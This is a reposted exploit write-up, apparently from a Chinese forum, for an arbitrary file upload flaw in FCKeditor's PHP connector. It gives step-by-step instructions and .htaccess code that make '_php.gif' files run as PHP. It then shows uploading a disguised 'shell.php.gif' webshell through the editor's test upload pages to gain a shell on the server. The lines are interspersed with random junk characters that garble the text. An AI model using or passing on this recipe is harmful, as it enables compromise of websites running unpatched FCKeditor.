FCKeditor所有php版本Upload上传漏洞. M* w% W+ n" ?6 C# t8 ^
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07( d2 P k% V& ?" O2 M
减小字体 增大字体
7 n4 P/ V/ F/ g* x[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
G) q9 t* x& i- Z8 U[+] Date: 2011
6 \1 c+ Q, P! w' X/ ~/ h) U: `[+] Author : sinesafe.cn; a8 n& p7 \+ c Z4 b
[+] Website : WwW.sinesafe.cn z' t! @8 J; L9 ]# C; o* ]8 C7 L7 _
———————————————————
1 z* r2 [( \8 p1.create a htaccess file:* ?( I3 j! \) `4 p7 @: ?
code:8 U- t% ?) ~6 Z# J' `. w v- e8 K
<FilesMatch “_php.gif”>
/ ^: [8 z- t; CSetHandler application/x-httpd-php
7 B: _. [- N7 G. x- l u3 \" q</FilesMatch>4 U: @; V+ s# }1 ]! q
g& {2 H+ M* A2.Now upload this htaccess with FCKeditor.
- `) W$ q: r; ?1 v: c$ A0 Y5 O
% H: {+ [) L3 n6 i2 ohttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html; j) g" W# F6 \9 b, Z3 k9 v
$ p6 H5 T( M) x# b% x1 rhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html4 ^6 ]/ f6 {3 e9 w8 F
P& f: V/ t9 O———————————————————————————————-# F7 w3 U% X M
3.Now upload shell.php.gif with FCKeditor." G! m( W" F P
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
5 z. D- z7 t7 g( L" a5.http://www.sinesafe.cn/anything/shell_php.gif5 Q# G. ?1 }: m$ Y: `
6.Now shell is available from server. |
2 j: X* U `; ^" e, Q% {+ L
- W9 M, F8 ^; q' }! R. Y( }/ v( I; `; ?. ^8 d
|
发表于 2013-10-27 17:25:21
收藏
支持
反对